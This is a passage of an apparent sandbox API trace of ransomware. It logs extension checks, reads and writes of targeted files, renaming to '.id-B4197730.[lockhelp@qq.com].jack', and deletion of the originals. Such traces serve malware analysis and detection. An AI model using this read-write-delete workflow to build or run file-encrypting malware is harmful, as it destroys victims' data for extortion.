lpString2=".dll") returned 1 [0196.991] lstrlenW (lpString=".docx") returned 5 [0196.991] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.991] lstrlenW (lpString=".pdf") returned 4 [0196.991] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.991] lstrlenW (lpString=".xls") returned 4 [0196.991] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.991] lstrlenW (lpString=".xlsx") returned 5 [0196.991] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.991] lstrlenW (lpString=".ppt") returned 4 [0196.991] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.991] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.992] lstrlenW (lpString=".zip") returned 4 [0196.992] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.992] lstrlenW (lpString=".rar") returned 4 [0196.992] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.992] lstrlenW (lpString=".bz2") returned 4 [0196.992] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.992] lstrlenW (lpString=".7z") returned 3 [0196.992] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.992] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.992] lstrlenW (lpString=".dbf") returned 4 [0196.992] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.992] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.992] lstrlenW (lpString=".1cd") returned 4 [0196.992] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.992] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.992] lstrlenW (lpString=".jpg") returned 4 [0196.992] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.992] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.992] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.992] lstrlenW (lpString=".doc") returned 4 [0196.992] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.992] lstrlenW (lpString=".docx") returned 5 [0196.992] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.992] lstrlenW (lpString=".pdf") returned 4 [0196.992] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.992] lstrlenW (lpString=".xls") returned 4 [0196.992] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.993] lstrlenW (lpString=".xlsx") returned 5 [0196.993] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.993] lstrlenW (lpString=".ppt") returned 4 [0196.993] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.993] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.993] lstrlenW (lpString=".zip") returned 4 [0196.993] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.993] lstrlenW (lpString=".rar") returned 4 [0196.993] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.993] lstrlenW (lpString=".bz2") returned 4 [0196.993] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.993] lstrlenW (lpString=".7z") returned 3 [0196.993] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.993] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.993] lstrlenW (lpString=".dbf") returned 4 [0196.993] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.993] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.993] lstrlenW (lpString=".1cd") returned 4 [0196.993] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.993] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.993] lstrlenW (lpString=".jpg") returned 4 [0196.993] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.993] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.993] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.994] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.231] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=18264) returned 1 [0197.231] CloseHandle (hObject=0x40c) returned 1 [0197.232] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 0x80 [0197.232] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.232] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.232] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.232] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.232] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.273] GetLastError () returned 0x0 [0197.273] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x4758, lpOverlapped=0x0) returned 1 [0197.294] WriteFile (in: hFile=0x418, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x4760, lpOverlapped=0x0) returned 1 [0197.295] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.295] WriteFile (in: hFile=0x418, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.295] SetEndOfFile (hFile=0x418) returned 1 [0197.296] CloseHandle (hObject=0x418) returned 1 [0197.297] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.297] SetEndOfFile (hFile=0x40c) returned 1 [0197.298] CloseHandle (hObject=0x40c) returned 1 [0197.298] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.298] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 1 [0197.298] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.299] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.299] lstrlenW (lpString=".doc") returned 4 [0197.299] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.299] lstrlenW (lpString=".docx") returned 5 [0197.299] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.299] lstrlenW (lpString=".pdf") returned 4 [0197.299] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.299] lstrlenW (lpString=".xls") returned 4 [0197.299] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.299] lstrlenW (lpString=".xlsx") returned 5 [0197.299] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.299] lstrlenW (lpString=".ppt") returned 4 [0197.299] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.299] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.299] lstrlenW (lpString=".zip") returned 4 [0197.299] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.299] lstrlenW (lpString=".rar") returned 4 [0197.299] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.299] lstrlenW (lpString=".bz2") returned 4 [0197.299] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.299] lstrlenW (lpString=".7z") returned 3 [0197.299] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.299] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.299] lstrlenW (lpString=".dbf") returned 4 [0197.299] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.299] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.299] lstrlenW (lpString=".1cd") returned 4 [0197.299] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.300] lstrlenW (lpString=".jpg") returned 4 [0197.300] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.300] lstrlenW (lpString=".doc") returned 4 [0197.300] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.300] lstrlenW (lpString=".docx") returned 5 [0197.300] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.300] lstrlenW (lpString=".pdf") returned 4 [0197.300] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.300] lstrlenW (lpString=".xls") returned 4 [0197.300] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.300] lstrlenW (lpString=".xlsx") returned 5 [0197.300] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.300] lstrlenW (lpString=".ppt") returned 4 [0197.300] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.300] lstrlenW (lpString=".zip") returned 4 [0197.300] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.300] lstrlenW (lpString=".rar") returned 4 [0197.300] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.300] lstrlenW (lpString=".bz2") returned 4 [0197.300] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.300] lstrlenW (lpString=".7z") returned 3 [0197.300] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.300] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.300] lstrlenW (lpString=".dbf") returned 4 [0197.301] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.301] lstrlenW (lpString=".1cd") returned 4 [0197.301] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.301] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 45 [0197.301] lstrlenW (lpString=".jpg") returned 4 [0197.301] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.301] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.301] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.301] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.301] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=14168) returned 1 [0197.301] CloseHandle (hObject=0x40c) returned 1 [0197.301] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 0x80 [0197.301] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.302] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.302] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.302] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.302] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.350] GetLastError () returned 0x0 [0197.350] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x3758, lpOverlapped=0x0) returned 1 [0197.364] WriteFile (in: hFile=0x41c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x3760, lpOverlapped=0x0) returned 1 [0197.365] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.365] WriteFile (in: hFile=0x41c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.365] SetEndOfFile (hFile=0x41c) returned 1 [0197.365] CloseHandle (hObject=0x41c) returned 1 [0197.366] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.366] SetEndOfFile (hFile=0x40c) returned 1 [0197.367] CloseHandle (hObject=0x40c) returned 1 [0197.367] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.368] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 1 [0197.368] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.368] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.368] lstrlenW (lpString=".doc") returned 4 [0197.368] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.368] lstrlenW (lpString=".docx") returned 5 [0197.368] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.368] lstrlenW (lpString=".pdf") returned 4 [0197.368] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.368] lstrlenW (lpString=".xls") returned 4 [0197.368] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.368] lstrlenW (lpString=".xlsx") returned 5 [0197.368] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.368] lstrlenW (lpString=".ppt") returned 4 [0197.368] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.368] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.368] lstrlenW (lpString=".zip") returned 4 [0197.369] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.369] lstrlenW (lpString=".rar") returned 4 [0197.369] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.369] lstrlenW (lpString=".bz2") returned 4 [0197.369] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.369] lstrlenW (lpString=".7z") returned 3 [0197.369] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.369] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.369] lstrlenW (lpString=".dbf") returned 4 [0197.369] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.369] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.369] lstrlenW (lpString=".1cd") returned 4 [0197.369] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.369] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.369] lstrlenW (lpString=".jpg") returned 4 [0197.369] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.369] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.369] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.369] lstrlenW (lpString=".doc") returned 4 [0197.369] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.369] lstrlenW (lpString=".docx") returned 5 [0197.369] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.369] lstrlenW (lpString=".pdf") returned 4 [0197.369] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.369] lstrlenW (lpString=".xls") returned 4 [0197.369] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.369] lstrlenW (lpString=".xlsx") returned 5 [0197.369] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.370] lstrlenW (lpString=".ppt") returned 4 [0197.370] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.370] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.370] lstrlenW (lpString=".zip") returned 4 [0197.370] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.370] lstrlenW (lpString=".rar") returned 4 [0197.370] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.370] lstrlenW (lpString=".bz2") returned 4 [0197.370] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.370] lstrlenW (lpString=".7z") returned 3 [0197.370] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.370] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.370] lstrlenW (lpString=".dbf") returned 4 [0197.370] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.370] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.370] lstrlenW (lpString=".1cd") returned 4 [0197.370] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.370] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0197.370] lstrlenW (lpString=".jpg") returned 4 [0197.370] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.370] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.370] lstrlenW (lpString="DisplayIcon.ico") returned 15 [0197.370] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.371] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=88533) returned 1 [0197.371] CloseHandle (hObject=0x40c) returned 1 [0197.371] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 0x80 [0197.371] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.371] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.371] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.371] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.371] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.371] GetLastError () returned 0x0 [0197.372] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x159d5, lpOverlapped=0x0) returned 1 [0197.382] WriteFile (in: hFile=0x41c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x159e0, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x159e0, lpOverlapped=0x0) returned 1 [0197.385] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.385] WriteFile (in: hFile=0x41c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xf2, lpOverlapped=0x0) returned 1 [0197.385] SetEndOfFile (hFile=0x41c) returned 1 [0197.385] CloseHandle (hObject=0x41c) returned 1 [0197.388] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.388] SetEndOfFile (hFile=0x40c) returned 1 [0197.389] CloseHandle (hObject=0x40c) returned 1 [0197.389] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.390] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 1 [0197.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.390] lstrlenW (lpString=".doc") returned 4 [0197.390] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.390] lstrlenW (lpString=".docx") returned 5 [0197.390] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0197.390] lstrlenW (lpString=".pdf") returned 4 [0197.391] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.391] lstrlenW (lpString=".xls") returned 4 [0197.391] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.391] lstrlenW (lpString=".xlsx") returned 5 [0197.391] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0197.391] lstrlenW (lpString=".ppt") returned 4 [0197.391] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.391] lstrlenW (lpString=".zip") returned 4 [0197.391] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.391] lstrlenW (lpString=".rar") returned 4 [0197.391] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.391] lstrlenW (lpString=".bz2") returned 4 [0197.391] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.391] lstrlenW (lpString=".7z") returned 3 [0197.391] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.391] lstrlenW (lpString=".dbf") returned 4 [0197.391] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.391] lstrlenW (lpString=".1cd") returned 4 [0197.391] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.391] lstrlenW (lpString=".jpg") returned 4 [0197.391] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.391] lstrlenW (lpString=".doc") returned 4 [0197.391] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.392] lstrlenW (lpString=".docx") returned 5 [0197.392] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0197.392] lstrlenW (lpString=".pdf") returned 4 [0197.392] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.392] lstrlenW (lpString=".xls") returned 4 [0197.392] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.392] lstrlenW (lpString=".xlsx") returned 5 [0197.392] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0197.392] lstrlenW (lpString=".ppt") returned 4 [0197.392] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.392] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.392] lstrlenW 